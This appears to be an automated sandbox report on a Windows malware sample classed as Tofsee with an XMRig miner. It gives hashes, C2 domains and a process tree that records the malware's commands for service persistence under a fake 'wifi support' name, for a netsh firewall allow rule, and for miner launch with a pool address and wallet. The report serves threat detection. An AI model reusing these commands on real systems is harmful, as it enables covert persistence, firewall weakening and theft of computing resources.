Analysis

  • max time kernel
    140s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20220901-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    20/12/2022, 15:28

General

  • Target

    file.exe

  • Size

    241KB

  • MD5

    3b53587307822e59eb2ac5c1849263c7

  • SHA1

    ccdfdf6ada38de1c9e7784fcc8852ebf58c5b940

  • SHA256

    56620ac330bd56eedb5dab95166a9b128bcb09783ac67caea3e84c8f218a0c8e

  • SHA512

    51986ad6bdeca247f3dbc48d4018fcd34dd39d8a16141ade4bd928537ffc68cdcdf692948b3b8b9d66fe5522b2361c2fdcfb7e4832e0fffbf381c1b83e1baeee

  • SSDEEP

    3072:BX8Gj9rLYT6iIqR5tWeAGf7zFrO3pUM0l3ChMLu/NHKH3SB7b/0w9yNHCDml:lV5rLYT6iIuWVK7BvyfHKXSZriCa

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • xmrig

    XMRig is a high-performance, open-source, cross-platform CPU/GPU miner.

  • XMRig Miner payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4256
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\tyuswrup\
      2⤵
        PID:904
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\wqsawqwp.exe" C:\Windows\SysWOW64\tyuswrup\
        2⤵
          PID:2012
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create tyuswrup binPath= "C:\Windows\SysWOW64\tyuswrup\wqsawqwp.exe /d\"C:\Users\Admin\AppData\Local\Temp\file.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:384
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description tyuswrup "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:1372
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start tyuswrup
          2⤵
          • Launches sc.exe
          PID:1768
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:4944
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4256 -s 808
          2⤵
          • Program crash
          PID:644
      • C:\Windows\SysWOW64\tyuswrup\wqsawqwp.exe
        C:\Windows\SysWOW64\tyuswrup\wqsawqwp.exe /d"C:\Users\Admin\AppData\Local\Temp\file.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:1304
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Sets service image path in registry
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:1720
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2060
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4256 -ip 4256
        1⤵
          PID:4932

Downloads

        • C:\Users\Admin\AppData\Local\Temp\wqsawqwp.exe

          Filesize

          10.3MB

          MD5

          e7ee1e2e88b6b434d227ece4ff5a0273

          SHA1

          f8359602b641b014ae7c06302f280c71a8cb3130

          SHA256

          83fd0273d531d09d1c0b56608a9b1c0f0b73969ddafa941773fa0632b2590898

          SHA512

          f13f772bb7350bbc590112cebef8790c92f6e69b0777c18f6c0b63636a2c8390f4960d36767ce8de80592798ffb63ea0b64f8e3ea2bbd3cb61f6388d0959de65

        • C:\Windows\SysWOW64\tyuswrup\wqsawqwp.exe

          Filesize

          10.3MB

          MD5

          e7ee1e2e88b6b434d227ece4ff5a0273

          SHA1

          f8359602b641b014ae7c06302f280c71a8cb3130

          SHA256

          83fd0273d531d09d1c0b56608a9b1c0f0b73969ddafa941773fa0632b2590898

          SHA512

          f13f772bb7350bbc590112cebef8790c92f6e69b0777c18f6c0b63636a2c8390f4960d36767ce8de80592798ffb63ea0b64f8e3ea2bbd3cb61f6388d0959de65

        • memory/1304-148-0x0000000000400000-0x0000000000466000-memory.dmp

          Filesize

          408KB

        • memory/1304-146-0x0000000000573000-0x0000000000584000-memory.dmp

          Filesize

          68KB

        • memory/1720-158-0x0000000002B60000-0x0000000002B70000-memory.dmp

          Filesize

          64KB

        • memory/1720-167-0x0000000007D90000-0x0000000007D97000-memory.dmp

          Filesize

          28KB

        • memory/1720-164-0x0000000007840000-0x0000000007C4B000-memory.dmp

          Filesize

          4.0MB

        • memory/1720-161-0x0000000002DF0000-0x0000000002DF5000-memory.dmp

          Filesize

          20KB

        • memory/1720-155-0x0000000002B50000-0x0000000002B56000-memory.dmp

          Filesize

          24KB

        • memory/1720-145-0x0000000000AC0000-0x0000000000AD5000-memory.dmp

          Filesize

          84KB

        • memory/1720-152-0x0000000002800000-0x0000000002A0F000-memory.dmp

          Filesize

          2.1MB

        • memory/1720-151-0x0000000000AC0000-0x0000000000AD5000-memory.dmp

          Filesize

          84KB

        • memory/1720-150-0x0000000000AC0000-0x0000000000AD5000-memory.dmp

          Filesize

          84KB

        • memory/2060-171-0x0000000000E00000-0x0000000000EF1000-memory.dmp

          Filesize

          964KB

        • memory/2060-176-0x0000000000E00000-0x0000000000EF1000-memory.dmp

          Filesize

          964KB

        • memory/4256-133-0x0000000000679000-0x0000000000689000-memory.dmp

          Filesize

          64KB

        • memory/4256-134-0x0000000000610000-0x0000000000623000-memory.dmp

          Filesize

          76KB

        • memory/4256-135-0x0000000000400000-0x0000000000466000-memory.dmp

          Filesize

          408KB

        • memory/4256-143-0x0000000000400000-0x0000000000466000-memory.dmp

          Filesize

          408KB